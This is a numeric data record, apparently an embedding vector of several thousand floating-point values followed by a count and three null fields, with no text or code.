-0.0014979627449065447, 0.012437684461474419, -0.001525886240415275, -0.02220912091434002, 0.009684964083135128, -0.006625985261052847, -0.008820234797894955, 0.009202157147228718, 0.010866760276257992, -0.016732504591345787, -0.007595202419906855, -0.0008102330029942095, -0.01756840944290161, 0.01193325873464346, -0.02019141986966133, -0.010484837926924229, -0.00910847820341587, -0.006777313072234392, -0.018087247386574745, -0.02094085142016411, -0.00448578130453825, -0.0011232468532398343, 0.002651835326105356, -0.011082942597568035, -0.023246796801686287, -0.004392102360725403, -0.004237171728163958, -0.0025113169103860855, 0.0005917988601140678, -0.008784204721450806, -0.001189903006888926, 0.0003076092980336398, -0.009151714853942394, -0.016790153458714485, 0.01254577562212944, -0.00618641497567296, 0.018836678937077522, -0.013381680473685265, 0.01627131551504135, 0.010124534368515015, -0.007191662210971117, -0.0121998842805624, 0.014066257514059544, -0.00758079020306468, -0.0027202931232750416, 0.0008669808157719672, 0.0106217535212636, -0.008640083484351635, -0.03496387228369713, 0.016516322270035744, -0.01823136769235134, 0.0009313850896432996, -0.006744885817170143, 0.019096096977591515, -0.00370392226614058, -0.003664288902655244, 0.002273516496643424, 0.023376505821943283, -0.005631546955555677, -0.017222518101334572, 0.006204430013895035, 0.025581564754247665, 0.011789137497544289, -0.0028500023763626814, 0.0034733277279883623, 0.017395462840795517, 0.00004008378891739994, -0.006690840236842632, 0.007231295574456453, -0.017842240631580353, 0.013828456401824951, 0.007876239717006683, 0.010434395633637905, 0.0032877714838832617, 0.01272592693567276, 0.007587996311485767, 0.0035634038504213095, 0.003021146636456251, 0.0014898559311404824, -0.005566692445427179, -0.007919475436210632, 0.020681433379650116, -0.002705880906432867, -0.01631455309689045, -0.027008365839719772, 0.01387889962643385, -0.006071117706596851, 0.0007904162630438805, -0.010074092075228691, 0.0033111912198364735, 0.020018475130200386, -0.0019222203409299254, -0.013641098514199257, 0.022670309990644455, -0.009411132894456387, 0.0001509897701907903, -0.011363979429006577, -0.004496590234339237, -0.01351138949394226, 0.010520868934690952, 0.0012655667960643768, 0.00305177248083055, 0.008049185387790203, -0.004874909296631813, -0.01925463043153286, -0.004565048031508923, 0.02189205400645733, 0.0025041108019649982, -0.00043011255911551416, 0.0024302485398948193, -0.0002675255236681551, -0.008899501524865627, -0.002084356965497136, 0.006914228200912476, -0.001359245739877224, 0.0047127725556492805, -0.006456642411649227, -0.010715432465076447, -0.00021269178250804543, -0.016083957627415657, 0.02971785143017769, -0.00800594873726368, 0.005083885509520769, -0.008438313379883766, -0.003464320208877325, 0.00949039962142706, 0.0001484000968048349, 0.002505912445485592, 0.0012565591605380177, 0.022122647613286972, 0.009166126139461994, -0.006971877068281174, 0.006409802939742804, -0.009187744930386543, 0.000373815099010244, 0.0358574278652668, -0.016876626759767532, 0.004928954876959324, -0.037327464669942856, -0.009648934006690979, -0.0008097825921140611, -0.014945398084819317, -0.005829714238643646, -0.00879861693829298, -0.0010908194817602634, 0.00798432994633913, 0.018029598519206047, 0.004547032993286848, 0.021661460399627686, 0.012589012272655964, -0.009692169725894928, 0.01833225227892399, -0.023045025765895844, -0.011039705947041512, -0.015449823811650276, -0.013424916192889214, -0.011976495385169983, -0.001947441603988409, -0.010355128906667233, 0.0034913429990410805, 0.00326435174793005, 0.01862049661576748, -0.026893069967627525, 0.016689268872141838, 0.013417710550129414, 0.018678145483136177, -0.020119359716773033, 0.00913730263710022, -0.003201298648491502, 0.00002696648152777925, 0.01173148863017559, -0.0004208797763567418, -0.018173718824982643, 0.005487425718456507, -0.00766726303845644, -0.012841224670410156, 0.033465009182691574, 0.016127195209264755, 0.0012664676178246737, 0.00588015653192997, -0.02380887046456337, 0.01092440914362669, -0.02409711293876171, 0.008503167890012264, -0.009303041733801365, -0.00044812774285674095, 0.012351211160421371, -0.018490787595510483, -0.009504811838269234, 0.009591285139322281, 0.0005062267300672829, -0.004766818135976791, 0.017943125218153, -0.008308603428304195, 0.002408630447462201, -0.03363795578479767, -0.01028306782245636, 0.010434395633637905, -0.009158920496702194, 0.00993717648088932, 0.012026937678456306, -0.014758040197193623, -0.004031798802316189, -0.0195861104875803, 0.013172703795135021, -0.0041723172180354595, -0.0007989734876900911, -0.01830342970788479, 0.018461963161826134, 0.0011070332257077098, 0.00046073837438598275, -0.0089643569663167, 0.022122647613286972, -0.003653479740023613, -0.005912583786994219, 0.0068529765121638775, -0.006153987720608711, 0.03167790174484253, 0.013907723128795624, 0.018490787595510483, -0.014304057694971561, 0.01240165438503027, 0.024875368922948837, -0.008892295882105827, -0.011875610798597336, 0.006961067672818899, 0.028247810900211334, -0.015031871385872364, -0.00959849078208208, 0.005786477588117123, 0.017755767330527306, -0.0002519874251447618, 0.013288001529872417, -0.010167771019041538, -0.00002153377681679558, 0.009058035910129547, -0.01765488274395466, -0.020407602190971375, 0.025350969284772873, 0.005235212855041027, 0.031245538964867592, -0.005029839929193258, -0.03291734680533409, -0.01860608346760273, -0.009360690601170063, 0.011882816441357136, -0.0015502067981287837, -0.014448178932070732, 0.01320873387157917, 0.011486482806503773, -0.006460245698690414, 0.014858925715088844, -0.0019240218680351973, -0.0006949357921257615, 0.01988876610994339, -0.006766503676772118, -0.00997320655733347, 0.004583063069730997, -0.0005044252029620111, 0.0006138674798421562, -0.0006318826344795525, 0.029213424772024155, -0.007022319361567497, -0.005454998463392258, 0.005415365099906921, 0.014599506743252277, 0.004284011200070381, 0.001020560273900628, -0.02578333392739296, 0.0005611730157397687, -0.010304686613380909, -0.002084356965497136, 0.017424287274479866, 0.0023113484494388103, 0.02612922526896, 0.018822265788912773, 0.01192605309188366, -0.008856265805661678, 0.0029004449024796486, -0.013360061682760715, -0.00465872697532177, -0.02710925228893757, -0.002336569596081972, 0.008164482191205025, 0.017208104953169823, -0.015003046952188015, 0.0032913745380938053, 0.0009737208019942045, 0.012963728047907352, 0.00635936064645648, 0.016401024535298347, 0.004716375842690468, 0.01663162000477314, -0.012444890104234219, -0.010859553702175617, -0.017092809081077576, 0.008769792504608631, 0.012394447810947895, -0.0018231368158012629, 0.003772379830479622, -0.009050829336047173, -0.027916332706809044, -0.027901919558644295, 0.014664361253380775, 0.026215698570013046, 0.03620331734418869, 0.006780915893614292, 0.011875610798597336, -0.0045326207764446735, -0.006676428020000458, 0.00928142387419939, 4.96121344895073e-7, -0.01725134253501892, -0.015608357265591621, -0.008128452114760876, 0.006056705489754677, -0.002329363487660885, -0.010405571199953556, 0.019658170640468597, 0.005033442750573158, -0.005181167274713516, -0.026590414345264435, 0.03943163901567459, 0.0027094839606434107, -0.010326304472982883, 0.0008404084364883602, 0.0013817647704854608, -0.029415195807814598, -0.0035868235863745213, -0.015579532831907272, -0.02347739040851593, -0.0063773756846785545, 0.018087247386574745, -0.004665933083742857, -0.026921894401311874, -0.027556028217077255, -0.019686995074152946, -0.007912269793450832, 0.0002481591945979744, 0.003844440681859851, -0.014722010120749474, 0.02216588519513607, -0.00039453257340937853, 0.012185472063720226, -0.013071819208562374, -0.01320152822881937, -0.006597161293029785, 0.000051455874199746177, 0.017510760575532913, -0.01389331091195345, 0.009022004902362823, 0.005101900547742844, -0.015608357265591621, 0.011681046336889267, 0.01107573602348566, 0.004835275933146477, 0.004878512118011713, -0.01454185787588358, -0.03297499567270279, -0.010946027003228664, 0.028002804145216942, 0.01078749354928732, 0.032484982162714005, -0.0012619637418538332, 0.019831117242574692, -0.023549450561404228, -0.003159863641485572, 0.009353484958410263, -0.031245538964867592, -0.01764046959578991, 0.019658170640468597, 0.00635936064645648, 0.019182570278644562, 0.008286985568702221, 0.0018042208394035697, -0.014073463156819344, 0.007587996311485767, -0.00035062056849710643, -0.037010397762060165, 0.015377762727439404, 0.009872321970760822, 0.002096967538818717, -0.014772452414035797, 0.020638197660446167, -0.0038660590071231127, 0.008863471448421478, -0.009014799259603024, 0.01013894658535719, 0.005282052326947451, -0.0051559461280703545, -0.012625042349100113, 0.0059846448712050915, -0.03098611906170845, 0.019096096977591515, 0.015896599739789963, 0.007624026853591204, 0.00474159698933363, -0.008704937994480133, 0.017121633514761925, 0.007415050640702248, 0.013352856040000916, 0.004756009206175804, 0.0067052519880235195, 0.013554626144468784, -0.006629588548094034, 0.0106217535212636, -0.009692169725894928, -0.009173332713544369, 0.009944383054971695, -0.0034372974187135696, 0.0030391619075089693, 0.0026356216985732317, 0.02582656964659691, -0.017395462840795517, 0.010967644862830639, 0.007364607881754637, -0.019124921411275864, -0.0012592615094035864, 0.004118271637707949, 0.0034823354799300432, 0.025005077943205833, 0.028925182297825813, 0.007854620926082134, 0.01175310742110014, 0.0016123591922223568, -0.0060494993813335896, 0.006330536212772131, -0.00265363696962595, -0.009951588697731495, 0.008510373532772064, 0.00784020870923996, 0.013295207172632217, -0.002496904693543911, -0.005253228358924389, -0.029126953333616257, 0.023246796801686287, -0.010873965919017792, -0.010340716689825058, -0.009922764264047146, -0.015089519321918488, -0.0011700863251462579, -0.023909755051136017, 0.010686608031392097, -0.00457225413993001, -0.015738066285848618, -0.0035237702541053295, 0.005285655613988638, 0.009360690601170063, 0.02997726947069168, -0.0000593375189055223, -0.03222556412220001, -0.002318554325029254, -0.024846544489264488, -0.010852348059415817, -0.013842868618667126, -0.00020402198424562812, -0.015276877209544182, 0.016818977892398834, 0.018087247386574745, -0.02222353406250477, -0.005181167274713516, 0.004669536370784044, 0.0032769623212516308, 0.022021763026714325, 0.015824539586901665, -0.009497606195509434, -0.03225439041852951, 0.015118343755602837, -0.018000774085521698, -0.00044339874875731766, 0.016847802326083183, -0.008200512267649174, 0.01568041741847992, -0.01729457825422287, 0.034762103110551834, 0.006258475594222546, -0.009072447195649147, -0.003934516571462154, -0.029544904828071594, 0.013554626144468784, -0.0010818119626492262, -0.01484451349824667, -0.019009623676538467, -0.00265363696962595, -0.021920878440141678, -0.0020789525005966425, 0.0006571038975380361, 0.02317473478615284, 0.01224311999976635, -0.01730899140238762, -0.0005963026778772473, -0.011745900847017765, 0.022410891950130463, -0.00037651738966815174, 0.013496977277100086, -0.010852348059415817, 0.014556270092725754, -0.001653794082812965, -0.019139332696795464, -0.005350510124117136, 0.010405571199953556, -0.004756009206175804, 0.02092644013464451, -0.004154301714152098, -0.009865115396678448, -0.020984089002013206, -0.01759723387658596, 0.01367712952196598, 0.007260120008140802, -0.003327404847368598, -0.004583063069730997, 0.012336798943579197, 0.02089761570096016, 0.025264495983719826, 0.004442544654011726, 0.02223794534802437, -0.030467282980680466, 0.005026236642152071, 0.025840982794761658, 0.0072889444418251514, -0.012783575803041458, 0.031245538964867592, -0.008243748918175697, 0.0035760144237428904, -0.031216714531183243, -0.00849596131592989, -0.00980026088654995, -0.023045025765895844, 0.002549148863181472, 0.0081788944080472, -0.012942109256982803, 0.001019659568555653, 0.008049185387790203, 0.005826110951602459, 0.019744643941521645, 0.036088019609451294, -0.00692503759637475, 0.015882188454270363, -0.005991850979626179, -0.004114668350666761, -0.008135657757520676, -0.01041998341679573, -0.015795715153217316, 0.00910847820341587, 0.0029328721575438976, -0.004168713930994272, -0.005087488330900669, -0.024630362167954445, -0.0034463051706552505, 0.013179910369217396, -0.011457658372819424, 0.006125163286924362, -0.030063742771744728, -0.005937805399298668, 0.0067016491666436195, 0.022396478801965714, 0.02056613564491272, 0.011082942597568035, 0.0036768994759768248, 0.0030481694266200066, -0.028175750747323036, -0.02220912091434002, 0.005811699200421572, 0.0033976640552282333, -0.006550321821123362, 0.004637108650058508, -0.008712143637239933, -0.02710925228893757, 0.005465807393193245, -0.004950573202222586, 0.005083885509520769, -0.0007079968345351517, -0.018058422952890396, 0.0025131183210760355, -0.00041232258081436157, 0.001725854817777872, -0.017352227121591568, -0.015305701643228531, 0.00204652501270175, -0.00848875567317009, -0.0066728247329592705, -0.005548677407205105, 0.017381051555275917, 0.01319432258605957, 0.01729457825422287, 0.004179523326456547, -0.0025005077477544546, 0.010657783597707748, 0.01193325873464346, 0.015132755972445011, -0.0013628487940877676, -0.013806838542222977, -0.013569038361310959, -0.0005152343073859811, 0.017553996294736862, -0.034733276814222336, 0.020090535283088684, 0.0028680176474153996, 0.010376746766269207, -0.010989263653755188, -0.00015436761896125972, 0.012740339152514935, 0.02902606688439846, 0.034416209906339645, -0.010535281151533127, -0.01516158040612936, -0.040613435208797455, 0.024673597887158394, -0.004719978664070368, -0.003412076272070408, -0.009439957328140736, -0.012459302321076393, 0.003844440681859851, 0.005386540666222572, -0.009865115396678448, 0.0006935846759006381, 0.009086859412491322, -0.020811142399907112, -0.020061710849404335, -0.006975479889661074, -0.016199255362153053, -0.007645644713193178, 0.024673597887158394, -0.007281738333404064, 0.03654921054840088, -0.002021303866058588, 0.01272592693567276, 0.00422636279836297, 0.009634521789848804, -0.01367712952196598, -0.011630604043602943, -0.030582578852772713, -0.012711514718830585, 0.012488126754760742, 0.010953232645988464, 0.008849059231579304, -0.005973835475742817, -0.00619001779705286, -0.005552280228585005, 0.013093437068164349, -0.013705953024327755, 0.014592300169169903, -0.009050829336047173, -0.029861971735954285, 0.017813416197896004, -0.010376746766269207, -0.013806838542222977, -0.006780915893614292, 0.0071448227390646935, 0.0097642308101058, -0.011140590533614159, -0.026287758722901344, 0.007339386735111475, -0.01241606567054987, 0.0068493736907839775, 0.00866170134395361, -0.008676113560795784, 0.013669922947883606, 0.0244718287140131, 0.006330536212772131, 0.013633892871439457, 0.006420612335205078, -0.018505198881030083, -0.0163001399487257, -0.008892295882105827, -0.0025851791724562645, 0.009692169725894928, 0.018173718824982643, -0.013619480654597282, -0.000014278441994974855, -0.029804322868585587, 0.002304142341017723, 0.01889432780444622, 0.025913042947649956, 0.0004922649823129177, -0.011789137497544289, 0.004366881214082241, -0.011335154995322227, -0.004302026238292456, 0.021272331476211548, -0.018029598519206047, -0.013165498152375221, 0.005253228358924389, 0.023362092673778534, -0.016487497836351395, -0.013965371996164322, 0.0012295364867895842, -0.0009953390108421445, 0.015810126438736916, 0.03646273538470268, -0.03383972495794296, 0.008596846833825111, 0.01209179311990738, 0.009252599440515041, 0.008214924484491348, -0.028103690594434738, -0.0005715317674912512, 0.011198239400982857, 0.01691986247897148, 0.00440291129052639, -0.01075866911560297, 0.03141848370432854, 0.005440586246550083, 0.008906708098948002, -0.029890796169638634, 0.001167384092696011, 0.004363277927041054, 0.007451080717146397, 0.0023527832236140966, -0.016415437683463097, -0.016242491081357002, 0.016545146703720093, 0.008560816757380962, 0.012999758124351501, -0.000947598775383085, -0.016098370775580406, -0.006979083176702261, 0.004338056780397892, -0.00675929756835103, 0.00156822195276618, 0.014916573651134968, -0.010773081332445145, -0.01690545119345188, -0.006726870313286781, -0.0089715626090765, -0.013432122766971588, -0.033782076090574265, 0.014577888883650303, 0.014448178932070732, 0.02094085142016411, -0.004813657607883215, 0.0061647966504096985, 0.008265367709100246, 0.006233254447579384, -0.029126953333616257, -0.014959810301661491, 0.00727092893794179, -0.005577501375228167, -0.010715432465076447, 0.018721381202340126, 0.00001249803517566761, 0.006712458096444607, 0.03162025287747383, 0.013705953024327755, 0.01595424860715866, -0.004918145947158337, 0.01566600613296032, 0.004338056780397892, 0.019499637186527252, 0.024558302015066147, 0.019470812752842903, 0.017755767330527306, 0.0008867974975146353, -0.014059050939977169, -0.008575228042900562, -0.0021041736472398043, 0.008099627681076527, 0.01862049661576748, -0.01155854295939207, 0.008243748918175697, -0.011176621541380882, 0.007948299869894981, 0.01729457825422287, -0.027556028217077255, 0.0069646709598600864, -0.0037867920473217964, -0.0069646709598600864, -0.009684964083135128, 0.01725134253501892, -0.013071819208562374, 0.009850704111158848, 0.009173332713544369, 0.013533007353544235, -0.009086859412491322, 0.010643371380865574, 0.011990907602012157, 0.00914450827986002, 0.0006489970837719738, -0.025595976039767265, -0.00882744137197733, -0.013756396248936653, 0.0033544276375323534, 0.005797286983579397, -0.010174976661801338, -0.004543429706245661, -0.023362092673778534, -0.00006952735566301271, -0.004103859420865774, 0.018173718824982643, 0.01209179311990738, -0.0055414712987840176, 0.017496349290013313, 0.016429848968982697, -0.008755380287766457, 0.018706969916820526, 0.0027761401142925024, -0.022050587460398674, -0.010607341304421425, -0.0061647966504096985, -0.01010291650891304, -0.00718085328117013, -0.025610389187932014, -0.018173718824982643, -0.009382308460772038, 0.014066257514059544, 0.005642356351017952, -0.010153358802199364, -0.006539512425661087, -0.011652221903204918, 0.003938119858503342, -0.005173961166292429, 0.020436426624655724, -0.01093161478638649, -0.003612044733017683, -0.010917202569544315, -0.008423901163041592, 0.00038192194188013673, 0.013778014108538628, 0.0008138359989970922, -0.025927456095814705, 0.014758040197193623, -0.0061035449616611, 0.013417710550129414, -0.02938637137413025, -0.012646660208702087, -0.01599748432636261, -0.006932243704795837, -0.01468597911298275, 0.010045267641544342, -0.0012781774858012795, 0.029112540185451508, 0.00165469478815794, -0.0005715317674912512, -0.009562460705637932, -0.005732432007789612, 0.023318856954574585, 0.02151733823120594, 0.0007192562916316092, 0.0016231682384386659, -0.0048568942584097385, -0.010974851436913013, -0.011392803862690926, -0.04104579985141754, 0.006352154538035393, 0.014930985867977142, -0.012423272244632244, 0.001978067448362708, 0.010823523625731468, 0.019730230793356895, 0.028002804145216942, -0.006535909604281187, -0.02285766787827015, -0.0022807226050645113, -0.0021293950267136097, 0.005098297726362944, 0.004936160985380411, 0.009519224055111408, -0.01766929402947426, -0.014181554317474365, -0.015565120615065098, 0.024961842224001884, 0.023290032520890236, -0.02213706076145172, -0.017726942896842957, 0.03352265805006027, -0.002378004603087902, 0.013338443823158741, 0.008243748918175697, -0.00009390415652887896, 0.017078395932912827, 0.01726575382053852, -0.016069546341896057, 0.00330758816562593, -0.01599748432636261, 0.0019330295035615563, -0.003559800796210766, 0.00996600091457367, 0.003118428634479642, -0.01667485572397709, -0.0097714364528656, 0.0025653624907135963, -0.004521811846643686, -0.007962712086737156, 0.02157498709857464, 0.000049626207328401506, -0.024241233244538307, -0.02638864517211914, 0.028824297711253166, 0.016112782061100006, 0.0061972239054739475, 0.0310149434953928, -0.038019247353076935, 0.004298423416912556, -0.010492044501006603, 0.0005197381251491606, -0.008337427861988544, 0.007998742163181305, 0.002642827806994319, -0.01985994167625904, 0.013828456401824951, -0.022670309990644455, -0.00948319397866726, -0.0004981199163012207, -0.010881172493100166, -0.013835662975907326, -0.02581215836107731, 0.007962712086737156, 0.01690545119345188, -0.003075192216783762, 0.005343304015696049, -0.005314480047672987, -0.008582434616982937, 0.004806451499462128, -0.00041907824925146997, -0.020162595435976982, -0.01985994167625904, 0.02513478696346283, 0.015781302005052567, -0.0075375535525381565, -0.03104376792907715, 0.0018501596059650183, 0.007036731578409672, 0.012797988019883633, -0.02254060097038746, 0.00039610889507457614, -0.014527445659041405, -0.014736422337591648, 0.0024392560590058565, -0.011875610798597336, 0.015060695819556713, 0.00845993123948574, -0.007479905150830746, 0.0025851791724562645, 0.002273516496643424, 0.012120616622269154, 0.0036931131035089493, -0.016112782061100006, -0.016804564744234085, 0.012156647630035877, 0.00037989523843862116, -0.005314480047672987, -0.015276877209544182, 0.002242890652269125, 0.026993954554200172, 0.003631861414760351, -0.018072834238409996, 0.030150214210152626, 0.004237171728163958, -0.013288001529872417, 0.008351840078830719, -0.021387629210948944, 0.01759723387658596, -0.01758282072842121, 0.0017213510582223535, -0.015248053707182407, 0.00749431736767292, 0.008546404540538788, 0.008568022400140762, -0.00801315438002348, -0.004078638274222612, 0.01025424338877201, 0.026547178626060486, 0.016761329025030136, 0.013633892871439457, -0.012502538971602917, 0.014268027618527412, 0.002118585864081979, 0.00845272559672594, -0.006625985261052847, 0.0037003192119300365, -0.0051523433066904545, 0.017035160213708878, -0.0019762658048421144, 0.004983000457286835, 0.006107148248702288, -0.006449436768889427, -0.004792039282619953, -0.0012295364867895842, 0.008560816757380962, 0.027181312441825867, 0.018000774085521698, 0.010823523625731468, 0.013432122766971588, -0.02575450949370861, -0.009641727432608604, -0.025264495983719826, -0.008207718841731548, -0.009742612950503826, -0.02375122159719467, -0.01288446132093668, 0.012228707782924175, -0.0014168943744152784, 0.000980026088654995, 0.0039993710815906525, -0.0032085045240819454, -0.0061323693953454494, 0.014253615401685238, 0.010556899011135101, -0.017063984647393227, 0.010564104653894901, 0.010607341304421425, 0.010664990171790123, 0.018764616921544075, -0.006597161293029785, 0.006366566754877567, -0.015738066285848618, -0.007047540508210659, -0.007897857576608658, 0.009101271629333496, -0.0045326207764446735, -0.005505440756678581, 0.014015814289450645, -0.010362334549427032, -0.012797988019883633, 0.019470812752842903, -0.011796344071626663, 0.002475286601111293, -0.00800594873726368, 0.005754050333052874, 0.009807467460632324, -0.010693814605474472, 0.003707525320351124, -0.008359046652913094, -0.012848430313169956, 0.028593702241778374, 0.026590414345264435, 0.007515935692936182, 0.002096967538818717, 0.01044880785048008, 0.01041277777403593, -0.01798636093735695, -0.014253615401685238, -0.007126807700842619, -0.009980413131415844, -0.0039993710815906525, -0.010182183235883713, 0.0002850903256330639, -0.019802292808890343, -0.006662015803158283, -0.00261220196262002, 0.010074092075228691, 0.008272573351860046, 0.0010340716689825058, -0.0358286015689373, 0.005826110951602459, 0.003275160910561681, 0.03389737382531166, 0.0019204188138246536, -0.008510373532772064, -0.0040858443826437, -0.006824152544140816, 0.013741984032094479, 0.004366881214082241, -0.00993717648088932, -0.005681989714503288, 0.0089787682518363, -0.01045601349323988, -0.01013894658535719, -0.001348436693660915, -0.018461963161826134, -0.007303356193006039, 0.01925463043153286, 0.0077969725243747234, -0.011810756288468838, 0.005429776851087809, 0.007339386735111475, 0.017337815836071968, 0.009504811838269234, -0.00931024830788374, 0.011335154995322227, -0.0003069337399210781, 0.00553786801174283, -0.006961067672818899, 0.005368525628000498, -0.024846544489264488, 0.00392010435461998, 0.010960439220070839, 0.02313149906694889, 0.013079024851322174, -0.0035021521616727114, -0.006485466845333576, 0.012978140264749527, 0.012351211160421371, 0.012459302321076393, -0.01498863473534584, 0.029573729261755943, -0.0014123906148597598, 0.00456865131855011, -0.005354113411158323, -0.0048929243348538876, -0.013871693052351475, 0.013453740626573563, -0.014253615401685238, 0.005473013501614332, 0.008942738175392151, -0.003675097832456231, -0.01863490790128708, 0.026287758722901344, 0.0089715626090765, 0.018015185371041298, 0.00766726303845644, 0.0012682691449299455, -0.00513793108984828, 0.0019294264493510127, -0.009202157147228718, 0.008344634436070919, 0.012704309076070786, -0.01110456045717001, 0.02147410251200199, 0.010160564444959164, 0.023030614480376244, 0.023304443806409836, -0.0018348466837778687, -0.007948299869894981, 0.018476374447345734, 0.01627131551504135, -0.02548067830502987, 0.010657783597707748, 0.006114353891462088, -0.006226048339158297, -0.002096967538818717, 0.009706581942737103, 0.016386613249778748, -0.012113410979509354, 0.017943125218153, 0.0018141291802749038, -0.014174348674714565, -0.00522800674661994, -0.007587996311485767, 0.00457225413993001, 0.007166441064327955, 0.014693185687065125, 0.01700633578002453, -0.009353484958410263, 0.00513793108984828, -0.01093161478638649, 0.014376118779182434, 0.021459689363837242, -0.013914929702877998, -0.01419596653431654, -0.002927467692643404, 0.02483213134109974, 0.01666044443845749, -0.031850848346948624, 0.023347681388258934, -0.002444660756736994, -0.022612661123275757, -0.011306330561637878, 0.002116784453392029, -0.012906079180538654, -0.007897857576608658, -0.012596217915415764, -0.002421241020783782, 0.00014581040886696428, -0.003631861414760351, -0.009728200733661652, -0.015565120615065098, 0.011767519637942314, -0.014181554317474365, -0.01368433516472578, 0.01831784099340439, 0.0006201727665029466, 0.00880582258105278, -0.021430864930152893, -0.005519852973520756, -0.01699192263185978, -0.002871620701625943, 0.009994825348258018, 0.006024278234690428, -0.0048568942584097385, 0.016545146703720093, -0.003314794274047017, 0.010189388878643513, -0.023592688143253326, -0.002950887428596616, -0.0007561874226666987, 0.0007043937803246081, -0.04219876974821091, -0.00189519755076617, 0.00758079020306468, 0.008524785749614239, 0.0048568942584097385, 0.0002706781669985503, 0.003988562151789665, -0.02085437998175621, -0.02477448433637619, 0.0021420056000351906, -0.000699439609888941, 0.012812400236725807, -0.0326579287648201, 0.006060308311134577, 0.0035111596807837486, -0.012898873537778854, -0.008186100050807, 0.014549064449965954, 0.012978140264749527, -0.024025052785873413, 0.0004193034546915442, -0.005321685690432787, 0.01388610526919365, 0.00644223066046834, 0.026042751967906952, -0.013626686297357082, 0.021387629210948944, 0.009267011657357216, 0.005080282222479582, 0.004410117398947477, -0.023304443806409836, 0.006352154538035393, 0.0017708927625790238, -0.0061647966504096985, 0.005916187074035406, -0.019297868013381958, 0.012459302321076393, -0.0260571651160717, 0.019009623676538467, 0.013907723128795624, 0.013770808465778828, -0.012805194593966007, 0.01092440914362669, -0.02181999385356903, 0.011825167573988438, -0.006096338853240013, 0.006658412516117096, 0.006885404232889414, -0.011018088087439537, -0.0009165225783362985, -0.032427333295345306, 0.011392803862690926, -0.02840634435415268, -0.030409634113311768, 0.003622853895649314, -0.0293431356549263, -0.017136044800281525, 0.004939763806760311, 0.02350621484220028, -0.010859553702175617, 0.011789137497544289, 0.0014060852117836475, 0.02572568506002426, 0.018807854503393173, 0.007040334865450859, 0.007804178632795811, 0.001001644297502935, -0.00042831103201024234, 0.012942109256982803, 0.006719664204865694, -0.0024356532376259565, -0.013525801710784435, -0.013842868618667126, 0.0007962711970321834, -0.020436426624655724, -0.021387629210948944, 0.001463733846321702, -0.04199700057506561, 0.014570682309567928, -0.0005071274936199188, 0.0020501280669122934, 0.014887749217450619, 0.003610243322327733, -0.023088261485099792, -0.00766726303845644, 0.005408158991485834, -0.014758040197193623, 0.008769792504608631, 0.004817260894924402, -0.006323330104351044, -0.0071448227390646935, -0.002368996851146221, -0.013388886116445065, -0.004601078573614359, 0.04660888761281967, 0.011118972674012184, -0.0058044930920004845, 0.015925424173474312, -0.01078749354928732, 0.0008156375261023641, 0.008366252295672894, 0.011436039581894875, -0.006153987720608711, -0.022425303235650063, -0.019831117242574692, 0.004727184772491455, 0.0008151871734298766, -0.013900517486035824, -0.0138500751927495, -0.00505145825445652, -0.004774024244397879, -0.009533636271953583, -0.0121998842805624, -0.023679159581661224, 0.02444300428032875, 0.004139889497309923, 0.00570360803976655, 0.012927697040140629, 0.0009755223290994763, 0.006726870313286781, 0.003635464468970895, -0.027008365839719772, -0.001610557665117085, -0.012711514718830585, -0.0016880228649824858, -0.009908352047204971, 0.007072762120515108, -0.00248429412022233, 0.014959810301661491, -0.0028986434917896986, 0.002914857119321823, 0.018000774085521698, -0.026864245533943176, -0.010117328725755215, -0.002147410064935684, -0.007137616630643606, -0.008236543275415897, -0.009202157147228718, -0.033090293407440186, 0.0228288434445858, -0.010362334549427032, 0.042602311819791794, 0.01570924185216427, 0.04660888761281967, 0.018000774085521698, 0.0058693476021289825, 0.005177564453333616, 0.00047515053302049637, -0.0003612044674810022, -0.01368433516472578, 0.010225419886410236, -0.010030855424702168, -0.03533858805894852, 0.00033035347587428987, 0.003507556626573205, 0.008985974825918674, -0.010023649781942368, -0.008200512267649174, -0.02673453651368618, 0.02157498709857464, 0.005941408220678568, 0.020378777757287025, 0.0009183241054415703, 0.025336557999253273, 0.0011853992473334074, -0.007847415283322334, 0.0028067659586668015, -0.025869807228446007, -0.007487111259251833, -0.03519446775317192, 0.0114144217222929, -0.01831784099340439, -0.00604589655995369, 0.002495103282853961, -0.0030896044336259365, -0.008085215464234352, 0.011702665127813816, -0.0017744958167895675, 0.005181167274713516, 0.0006354856886900961, -0.006096338853240013, 0.0036138463765382767, 0.005588310770690441, -0.01761164516210556, 0.02739749476313591, 0.005981041584163904, 0.00261040055193007, -0.04444706812500954, 0.013115054927766323, -0.00033575802808627486, -0.0019348309142515063, 0.0326002798974514, 0.0002778842463158071, -0.0027815448120236397, 0.030726701021194458, -0.029299898073077202, 0.001525886240415275, -0.009267011657357216, -0.01241606567054987, -0.028838708996772766, 0.02318914793431759, -0.027584852650761604, -0.0037183344829827547, 0.004010180477052927, 0.022310005500912666, 0.013958166353404522, -0.014599506743252277, -0.0006323330453597009, -0.0026482322718948126, -0.006481864023953676, 0.005390143487602472, -0.012264738790690899, -0.005473013501614332, 0.006355757359415293, -0.018706969916820526, 0.005343304015696049, 0.010030855424702168, -0.03136083483695984, -0.01994641311466694, -0.0028247812297195196, 0.015348938293755054, 0.02284325659275055, 0.02148851379752159, 0.0012142235646024346, 0.005422570742666721, 0.02252618782222271, 0.002812170423567295, 0.007551965769380331, 0.02612922526896, 0.004604681394994259, -0.0008940036059357226, 0.02310267463326454, -0.0016096568433567882, 0.023088261485099792, 0.015031871385872364, 0.022929728031158447, 0.018029598519206047, 0.014613918960094452, -0.022627074271440506, 0.009865115396678448, 0.008813029155135155, -0.0016826184000819921, -0.006380978971719742, 0.0036282583605498075, 0.017337815836071968, 0.004723581951111555, 0.0020807539112865925, -0.006337742321193218, 0.0015240847133100033, 0.018346665427088737, -0.0025203244294971228, 0.03398384526371956, -0.0048316726461052895, 0.01224311999976635, 0.00653230631724, 0.005195579491555691, 0.00200148718431592, -0.02050848677754402, 0.013554626144468784, -0.009512018412351608, 0.013756396248936653, -0.006308917887508869, 0.008366252295672894, -0.0032499395310878754, -0.032139092683792114, -0.006950258743017912, -0.0051559461280703545, -0.016732504591345787, 0.02674894779920578, 0.00448938412591815, 0.011169414967298508, 0.012934903614223003, 0.0007323173340409994, 0.0037111283745616674, -0.004939763806760311, -0.007688881363719702, -0.026489529758691788, -0.007335783913731575, 0.021257920190691948, -0.013295207172632217, -0.008726555854082108, 0.0017501752590760589, -0.0056279441341757774, 0.00032134586945176125, 0.0017519767861813307, -0.013986990787088871, 0.015882188454270363, 0.004211950581520796, -0.009065241552889347, 0.007998742163181305, -0.004460560157895088, 0.0018150300020352006, 0.007472699042409658, 0.002120387274771929, 0.02052289992570877, -0.00044114686897955835, 0.009014799259603024, -0.004817260894924402 ]
2,291
null
null
null
